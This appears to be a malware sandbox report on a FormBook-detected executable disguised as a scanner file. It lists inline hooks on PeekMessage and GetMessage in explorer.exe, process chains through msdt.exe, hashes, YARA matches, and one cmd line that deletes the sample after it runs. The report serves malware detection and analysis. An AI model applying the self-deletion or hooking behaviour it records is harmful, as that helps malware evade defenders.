                                            X-DIS-Request-ID: 1b5ceba3c5d5b991c6e7d017fd2df245
                                            Set-Cookie: dis-remote-addr=84.17.52.74
                                            Set-Cookie: dis-timestamp=2021-01-13T13:00:43-08:00
                                            Set-Cookie: dis-request-id=1b5ceba3c5d5b991c6e7d017fd2df245
                                            X-Frame-Options: sameorigin


                                            Code Manipulations

                                            User Modules

                                            Hook Summary

                                            Function NameHook TypeActive in Processes
                                            PeekMessageAINLINEexplorer.exe
                                            PeekMessageWINLINEexplorer.exe
                                            GetMessageWINLINEexplorer.exe
                                            GetMessageAINLINEexplorer.exe

                                            Processes

                                            Process: explorer.exe, Module: user32.dll
                                            Function NameHook TypeNew Data
                                            PeekMessageAINLINE0x48 0x8B 0xB8 0x83 0x3E 0xE2
                                            PeekMessageWINLINE0x48 0x8B 0xB8 0x8B 0xBE 0xE2
                                            GetMessageWINLINE0x48 0x8B 0xB8 0x8B 0xBE 0xE2
                                            GetMessageAINLINE0x48 0x8B 0xB8 0x83 0x3E 0xE2

                                            Statistics

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Start time:21:58:09
                                            Start date:13/01/2021
                                            Path:C:\Users\user\Desktop\SKM_C36821010708320.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Users\user\Desktop\SKM_C36821010708320.exe'
                                            Imagebase:0x9d0000
                                            File size:784896 bytes
                                            MD5 hash:15D8096422D137C7388908BB2BE61EC4
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.234017066.0000000003DC9000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.234017066.0000000003DC9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.234017066.0000000003DC9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.233265389.0000000002DC1000.00000004.00000001.sdmp, Author: Joe Security
                                            Reputation:low

                                            General

                                            Start time:21:58:16
                                            Start date:13/01/2021
                                            Path:C:\Users\user\Desktop\SKM_C36821010708320.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\Desktop\SKM_C36821010708320.exe
                                            Imagebase:0xb50000
                                            File size:784896 bytes
                                            MD5 hash:15D8096422D137C7388908BB2BE61EC4
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.272074038.00000000013A0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.272074038.00000000013A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.272074038.00000000013A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            General

                                            Start time:21:58:18
                                            Start date:13/01/2021
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:
                                            Imagebase:0x7ff714890000
                                            File size:3933184 bytes
                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:21:58:32
                                            Start date:13/01/2021
                                            Path:C:\Windows\SysWOW64\msdt.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\msdt.exe
                                            Imagebase:0xb60000
                                            File size:1508352 bytes
                                            MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.568720643.0000000004C00000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.568720643.0000000004C00000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.568720643.0000000004C00000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.568632673.0000000004BB0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.568632673.0000000004BB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.568632673.0000000004BB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate

                                            General

                                            Start time:21:58:36
                                            Start date:13/01/2021
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c del 'C:\Users\user\Desktop\SKM_C36821010708320.exe'
                                            Imagebase:0xe10000
                                            File size:232960 bytes
                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:21:58:37
                                            Start date:13/01/2021
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6b2800000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Disassembly

                                            Code Analysis

                                            Reset < >